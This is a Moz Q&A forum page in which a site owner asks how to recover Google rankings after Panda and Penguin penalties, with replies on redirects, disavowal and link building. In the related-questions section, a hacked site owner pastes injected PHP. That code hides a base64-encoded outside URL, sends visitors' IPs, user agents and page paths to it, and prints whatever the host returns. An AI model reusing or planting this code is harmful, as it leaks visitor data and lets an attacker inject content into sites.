Trying to escape from Google algorithm ranking drop
-
in 2010 our website was ranking number 1 for many keywords. we suddenly saw a crash in this a few years ago. we have since identified we have been hit by many shades of Panda and penguin updates. Mainly due to low quality back-links and poor content (some duplicates).
- since then we have done a major overhaul of our backlink profile. We have saved rankings that went from number 1 for many keywords to number 60 -70. We are now placed at around 11 to 18 rankings.
- We have also looked at our duplicate content issues, and removed all duplicate content, introduced a blog for fresh bi daily updates in an attempt to gain traffic. We also amalgamated many small low quality pages to larger higher quality content pages.
- we are now mobile friendly with a dynamic site, and our site speed is good (around 80).
- we have switched to https, and also upgraded our website for better conversions.
- we have looked at the technical issues of the site and don't have many major issues, although we do have 404's coming up in the google webmaster tools for old pages we removed due to duplicate content.
- we are link building at a pace of around 40 mentions a month. some are no follow, some do follow and some no links. We are diversifying links to include branding in addition to target keywords.
- We have pretty much exhausted every avenue we can think of now, but we cannot jump over to page 1 for any significant keywords we are targeting. Our competitor websites are not that powerful, and metrics are similar to ours if not lower.
1. please can you advise anything else you can think of that we should look at.
2. we are even considering going to a new domain and 301'ing all pages to this domain in an attempt to shake off the algorithm filter (penalties). has anyone done this? how long can we expect to get at least the same ranking for the new domain if 301 all urls to it? do you think its worth it? we know the risk of doing this, and so wanted to seek some advice.
3. we have on the other hand considered the fact that we have disavowed so many links (70%) that this could be a cause of the page two problem, however we are link building according to moz metric standards and majestic standards with no benefit.. do you think we should increase link building?
Advice is appreciated!
-
Hey There!
Sounds like you're doing a lot of things by-the-books and "right" "on paper" but it's really tough to know if you're on the right track for sure without seeing the site or an example of some of the links being build, or content, etc.
I say this because "40 links a month" for example sounds like a nice number, but also sounds suspect because that's a pretty sizable amount of links, which makes me wonder about the quality of them.
What I'd be curious about is - what are the things outside of SEO or SEO tactics/fixes have been done? I'm thinking in regards to social, audience building, brand building, design upgrades, content, adding value etc? Also, what type of site is this and how big is it?
The other thing that's tough to know is how well the technical things were implemented. For example, switching to https among other things can create a lot of redirect chains. I would try to undo redirect chains and only do page->page redirects (instead of having chains of page->page->page->page etc).
And right, it's tough to know if your disavow is helping or hurting without knowing a lot of the specifics.
If it was me, I'd make sure you're focusing enough on others things besides just directly on SEO. That doesn't mean you'd ignore SEO when doing social, content, audience building etc - just that you're taking a more holistic view. I think Google definitely favors recovering sites that prove they are building something people want.
-
This has been a long struggle which has caused a massive traffic drop. Do you think we should switch to a new domain with 301 redirects?
-
If you ask me you are doing everything right and you have to keep doing it. I remember when I was doing the same for one of my client, the rankings did improve but didn’t really hit the first page for many of the real money making keywords.
I think when your website went through Google penalty it took more than usual to gain the trust of Google. If I would be at your place, I would have looked in to the past data and see how every penguin and panda update affect my traffic and rankings.
If the ranking and traffic went positive (significantly) then you should continue what you are doing and wait for the penguin and panda update to release. This way they will look in to your efforts again and give you back the rankings that you deserve.
Also, my advice is to get a link from highest authority websites (if possible) that Google really trust, this should also help big time.
Adding my two cents!
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Does .me takes more time to rank than .com?
Hi, our company website is about freight forwarding, and im feared about .me extension they have taken. The location is for Dubai and the website is running google ads with a no-indexed landing page. I have the doubt, that our cargo company based website shipwaves.me is not receiving Google ads attention in that case. Besides, the other confusion is shipwaves.me takes time to rank for the keywords with high search or not other than .com extension. I'm confused why this company has taken, .me extension and anybody got the idea- is this .me is a top-level domain or it takes more time than .com domains.
White Hat / Black Hat SEO | | LayaPaul0 -
SEMrush vs GA rankings drop since February and December 2018?
I am wondering if someone can help me understand what's going on with our site. We had a 50% drop in the number of keywords ranking from February 2018 to October in SEMrush. Looking at SEMrush, I am actually seeing a drop after 2/208 with many competitor's sites as well. We saw moderate improvement in November, but around December 6th, we started seeing a decline the number of keywords ranking again. In Google Analytics, there was a 10-15% drop in traffic after February 2018, which recovered September to December, but since early December, there is a drop again. In GWT, I am seeing something similar to analytics with impressions and clicks. We have done some SEO the past couple of years, but we have taken care to do things white-hat so as not to incur a penalty. We have also invested in writing content for our blog on a regular basis. Any thoughts?
White Hat / Black Hat SEO | | kekepeche0 -
Google Penguin penalty is automated or manual?
Hi, I have seen some of our competitors are missing from top SERP and seems to be penalised as per this penalty checker: http://pixelgroove.com/serp/sandbox_checker/. Is this right tool to check penalty? Or any other good tools available? Are these penalties because of recent Penguin update? If so, is this a automated or manual penalty from Google? I don't think all of these tried with black-hat techniques and got penalised. The new penguin update might triggered their back-links causing this penalty. Even we dropped for last 2 weeks. What's the solution for this? How effectively link-audit works? Thanks, Satish
White Hat / Black Hat SEO | | vtmoz0 -
How to remove this type of external link from Google
Hello, My website has been hacked few days Before, But after resolved it It is generating bad links, So i am Dis-vowing it , But as it is generating links like this,
White Hat / Black Hat SEO | | innovativekrishna1
http://domain.com/a></p><h1>DIXCEL HS-typeスリットディ
i am Not able to disavow it As it generating Spacing between. So my question is : Is there any Way to remove this Type of link from google???
If any body know Please Let me know, I need Do remove this As soon as possible,
please Help, Thank you0 -
How does the Google Treat 301 Redirects?
Hi, My website was one of many that dropped in rankings this last Friday, The company that i outsourced my SEO 4 months ago did a bad job. Now i'm doing everything my self to recover, so i was thinking getting a new hosting, duplicate the website with a same content (i have original quality content) and 301 my old domain to new one? How long can it last with Google? Can penalties be passed via 301 redirects ? Looking forward to your help.
White Hat / Black Hat SEO | | mezozcorp0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Why is this ranking first in Google Places for this term....?
"Best Bar In Chicago" - http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=best+bar+in+chicago They have only 5 Google reviews, and their local directory reviews are suspect. One of them goes to rateclubs.com and it's not even a page for their business, while one of them doesn't have user reviews, it's just an editorial review. The other one at superpages.com doesn't even link back to their site, it links to their restaurants.com profile. What is going on here? I've been trying to figure this out for a while as their first place ranking has been solidified for quite some time now. I can also tell you that a few of the bars listed below them have a MUCH higher profile and are better known. You can see that just by the reviews.
White Hat / Black Hat SEO | | MichaelWeisbaum0 -
How much time do you think Google employees spend reverse engineering what we do?
Lets face it, it's the corner stone of SEO, reverse engineering sites to guess at what big G does. It would just make sense they did the same to learn all our tactics.
White Hat / Black Hat SEO | | naffhampton1